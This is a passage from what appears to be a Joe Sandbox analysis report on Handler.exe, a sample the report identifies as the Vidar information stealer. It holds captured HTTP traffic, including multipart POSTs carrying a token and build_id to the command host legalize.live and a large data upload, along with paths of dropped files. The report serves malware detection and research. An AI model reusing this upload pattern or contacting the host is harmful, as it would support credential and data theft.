-2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 31 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700281,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 62 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 63 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 65 65 5c Data Ascii: _.ae\u003dfunction(a){if(a instanceof _.Zd)return a.i;throw Error(\"H\");};_.ce\u003dfunction(a){if(be.test(a))return a};_.de\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"H\");else a\u003d_.ce(a);return a};_.ee\
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 43 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 Data Ascii: :(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.pe\u003dfunction(a,b){_.Cb(b,function(c,d){d\u003d\u003d\"style\"?a.sty
2025-01-15 19:16:15 UTC	1390	IN	Data Raw: 2c 64 29 7d 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 72 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 76 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 Data Ascii: ,d)}};\n_.ue\u003dfunction(a){return _.re(document,a)};_.re\u003dfunction(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.ve\u003dfunction(a){let b;for(;b\u003

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:15 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:16:15 UTC	933	IN	HTTP/1.1 200 OK Version: 714120572 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 15 Jan 2025 19:16:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-15 19:16:15 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-15 19:16:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Handler.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\8q9zu\2dtjeu

C:\ProgramData\8q9zu\3oh479

C:\ProgramData\8q9zu\6xb1d2

C:\ProgramData\8q9zu\hlnohdjeu

C:\ProgramData\8q9zu\l6xlf3

Windows Analysis Report
Handler.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:19 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 904 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:16:19 UTC	904	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 36 39 36 38 35 37 36 34 37 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736968576472",null,null,null,
2025-01-15 19:16:19 UTC	950	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=h55AreY1pqHzt5sqiOmUrrxNw4pjoSK8ccvDoe_gM7w7gBKuQIDIweOTsHPeHgPj7MWn_5hhJ-rvD_lsAJrFmPK16DM8XKx-irPeLLx1aoE3Xm15HbtpnzKhUp_WdWKqK_zbzzgfG3CC6O6Q-rpXV4Z4vXX_r7VTAq-ES_BTXKOwvBYEFSd67zuABfHmKtbz; expires=Thu, 17-Jul-2025 19:16:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Wed, 15 Jan 2025 19:16:19 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Wed, 15 Jan 2025 19:16:19 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2025-01-15 19:16:19 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2025-01-15 19:16:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:20 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----79h47yuk6f3eu3o890r1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 1089 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:20 UTC	1089	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 39 68 34 37 79 75 6b 36 66 33 65 75 33 6f 38 39 30 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 37 39 68 34 37 79 75 6b 36 66 33 65 75 33 6f 38 39 30 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 37 39 68 34 37 79 75 6b 36 66 33 65 75 33 6f 38 39 30 72 31 0d 0a 43 6f 6e 74 Data Ascii: ------79h47yuk6f3eu3o890r1Content-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------79h47yuk6f3eu3o890r1Content-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------79h47yuk6f3eu3o890r1Cont
2025-01-15 19:16:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 19:16:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-15 19:16:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:16:22 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----hlnohdjeua1nyu3ohlny User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: legalize.live Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 61 61 30 39 35 61 32 63 37 36 62 35 35 61 35 63 64 37 34 31 32 38 35 61 61 38 37 36 38 33 64 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 66 65 63 63 31 61 37 34 66 30 38 35 61 35 38 66 31 64 65 62 65 34 62 39 32 62 32 63 35 39 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 6e 6f 68 64 6a 65 75 61 31 6e 79 75 33 6f 68 6c 6e 79 0d 0a 43 6f 6e 74 Data Ascii: ------hlnohdjeua1nyu3ohlnyContent-Disposition: form-data; name="token"4aa095a2c76b55a5cd741285aa87683d------hlnohdjeua1nyu3ohlnyContent-Disposition: form-data; name="build_id"74fecc1a74f085a58f1debe4b92b2c59------hlnohdjeua1nyu3ohlnyCont
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-15 19:16:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 